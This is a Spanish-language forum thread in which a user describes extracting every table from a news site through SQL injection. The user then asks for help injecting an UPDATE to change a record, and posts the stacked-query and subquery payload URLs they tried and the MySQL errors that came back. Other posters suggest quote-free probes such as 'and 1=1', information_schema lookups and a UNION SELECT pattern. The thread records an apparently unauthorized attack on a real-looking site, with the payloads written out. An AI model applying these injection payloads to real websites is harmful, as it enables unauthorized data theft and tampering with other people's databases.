Inyeccion SQL (mysql) UPDATE dentro de un SELECT

[odeONeSs]

Os cuento mas o menos, he conseguido sacar todas las tablas, pero al intentar hacer un update me salta un filtro por la comilla, ya que al poner comilla simple el codigo php lo remplaza por '\\\'.

Código (html4strict) [Seleccionar] Expandir

http://www.web.com/noticia.php?id=-1'; UPDATE Basededatos.noticias+SET+breve+=+0x4572726f72+WHERE+id+=+8+;/*

El error que devuelve es este:

Código (apache) [Seleccionar] Expandir

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'\\\';UPDATE web.noticias SET breve = 0x4572726f72 WHERE id = 8 ;/*' at line 1

Alguna vez os habeis encontrado con esto? alguna idea?

Gracias de antemano!

[Darioxhcx]

con information_schema trataste ?
o no existe ?? emmmmm

[WHK]

intenta sacarlo sin comillas para ver si realmente es necesario;
http://www.web.com/noticia.php?id=1 and 1=1
Si no te funciona y obligadamente necesitas escapar con esa comilla no puedes hacer nada por los slashses que agrega el php.

[odeONeSs]

con information_schema trataste ?
o no existe ?? emmmmm

Si si, tengo la tabla donde quiero hacer el UPDATE, las columnas y he hecho pruebas haciendo consultas, vamos que si que existe.

Leyendo por ahi... he intentado aplicar esto... pero na da..

Por cierto WHK http://www.web.com/noticia.php?id=1 and 1=1 Esto no me tira error, debe ser que los slashses estan puestos para evitar los strings.

Código (html4strict) [Seleccionar] Expandir

http://www.web.com/noticia.php?id=-1+and+(UPDATE+Basededatos.noticias+SET+breve+=+0x4572726f72+WHERE+id+=+8+)=1/*


Código (apache) [Seleccionar] Expandir

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'UPDATE Basededatos.noticias SET breve = 0x4572726f72 WHERE id = 8 )=1/*' at line 1

Alguna idea???

Muchas gracias!!

[pepeluxx]

Código (html4strict) [Seleccionar] Expandir

http://www.web.com/noticia.php?id=-1+and+(UPDATE+Basededatos.noticias+SET+breve+=+0x4572726f72+WHERE+id+=+8+)=1/*


No puedes meter un update dentro de un select 

[Krackwar ™]

hay no veo ningun select 

[Azielito]

jahahahahah!!!!

y entonces como hacen para obtener los registros de la base de datos?

el SELECT va implicito al hacer una consulta a tu base de datos

[Krackwar ™]

No te rias toy enfermo a si que no tengo todas mis neuronas funcionando  .

Si , cierto que el select esta en el noticia.php.

[Azielito]

perdon, es que me hizo gracia

no es personal pues, disculpa...

Te explico

cuando haces una web que toma datos de una base de datos, para recuperar haces algo parecido a esto

Código (sql) [Seleccionar] Expandir


SELECT * FROM `noticias` WHERE id=$_GET['id']


Siempre haces eso (es un ejemplo xD) cuando haces un sistema de noticias, pero siempre tienes un "select" lo que hacemos a la hora de una SQLinjection es modificar ese "SELECT"

quedando algo así

Código (sql) [Seleccionar] Expandir


SELECT * FROM `noticias` WHERE id=-1 AND UNION SELEC 0,1,2.....
                                  ^aqui nuestro code

o sea que, el "SELECT" va implicito

[Krackwar ™]

perdon, es que me hizo gracia

no es personal pues, disculpa...

No importa 

Te explico

cuando haces una web que toma datos de una base de datos, para recuperar haces algo parecido a esto

Código (sql) [Seleccionar] Expandir


SELECT * FROM `noticias` WHERE id=$_GET['id']


Siempre haces eso (es un ejemplo xD) cuando haces un sistema de noticias, pero siempre tienes un "select" lo que hacemos a la hora de una SQLinjection es modificar ese "SELECT"

quedando algo así

Código (sql) [Seleccionar] Expandir


SELECT * FROM `noticias` WHERE id=-1 AND UNION SELEC 0,1,2.....
                                  ^aqui nuestro code

o sea que, el "SELECT" va implicito

Si me lo explicabas a mi , ya lo se  si se hacer consultas desde PHP  , aunque nunca esta de mas una explicacion para los que no entienden